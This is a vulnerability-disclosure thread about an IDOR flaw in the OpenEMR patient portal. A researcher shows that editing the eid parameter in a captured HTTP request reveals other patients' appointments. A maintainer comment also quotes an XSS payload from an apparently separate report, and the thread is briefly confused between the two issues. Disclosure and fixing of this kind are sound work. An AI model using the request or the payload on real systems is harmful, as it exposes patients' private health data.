Idor disclose other user's appointment in openemr/openemr

Valid

Reported on

Jul 25th 2022


Description:-

In this case an idor allow an attacker to view portal user's appointments

Proof of Concept

1.Goto http://demo.openemr.io/openemr/portal/home.php and then goto my profile >my appointment
2.Click on edit appointment button and capture the request in burp suite 
3. Change eid parameter to any number 

poc

GET https://demo.openemr.io/openemr/portal/add_edit_event_user.php?eid=24 <-- Change this to 23,22,25

Host: demo.openemr.io

User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: /

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: https://demo.openemr.io/openemr/portal/home.php

X-Requested-With: XMLHttpRequest

DNT: 1

Connection: keep-alive

Cookie: PortalOpenEMR=Sessionid

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: no-cors

Sec-Fetch-Site: same-origin

Pragma: no-cache

Cache-Control: no-cache




# Impact

An attacker can view all Appointments
We are processing your report and will contact the openemr team within 24 hours. 10 months ago
We have contacted a member of the openemr team and are waiting to hear back 9 months ago
We have sent a follow up to the openemr team. We will try again in 7 days. 9 months ago
Brady Miller
9 months ago

Maintainer


Hi @Distorted_Hacker , I was unable to confirm this. I used same portal demo link in step 1 above and entered Phil"><img src=x onerror=prompt(2)> into First name field (in My Profile) in step 2. Step 3 is a bit confusing since can't go to direct link like that (I ended up needing to log into openemr at https://demo.openemr.io/openemr for step 3 (also unclear if you meant to have a discrepancy in http in step 1 and then https in step 3)).

Brady Miller
9 months ago

Maintainer


Used wrong name on above message, meant for this to go to @gaurav-g2

Distorted_Hacker
9 months ago

Researcher


Hi @bradymiller after 2nd step we have to login as admin in 3rd step and then visit portal audits section here admin will receive 401 error and he cannot access portal audit section

Distorted_Hacker
9 months ago

Researcher


sorry i mean 3rd step we have to login as admin . And in 1st and 2nd step login as patient

stephen waite
9 months ago

Maintainer


unable to reproduce this morning @gaurav-g2 at https://demo.openemr.io/openemr/interface/login/login.php?site=default, can you try again please? thank you

stephen waite
9 months ago

Maintainer


this happens when you are logged into the openemr portal and the openemr app in the same browser session, once you log out of the portal the access is restored

We have sent a second follow up to the openemr team. We will try again in 10 days. 9 months ago
Distorted_Hacker modified the report
9 months ago
Distorted_Hacker
9 months ago

Researcher


Hi @bradymiller check out new update

We have sent a third and final follow up to the openemr team. This report is now considered stale. 9 months ago
stephen waite validated this vulnerability 9 months ago

Thanks for the report. A preliminary fix has been posted in commit 86c1c443e0643eed82e2a66da4573fb71f73cbcd

Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 1-3 weeks. After we do that, then will be ok to make CVE # and make it public.

Thanks!

Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the openemr team. We will try again in 7 days. 9 months ago
We have sent a second fix follow up to the openemr team. We will try again in 10 days. 9 months ago
We have sent a third and final fix follow up to the openemr team. This report is now considered stale. 8 months ago
Brady Miller marked this as fixed in 7.0.0.2 with commit 235b19 7 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller published this vulnerability 5 months ago
Brady Miller
5 months ago

Maintainer


@admin, please assign a CVE. thanks!

to join this conversation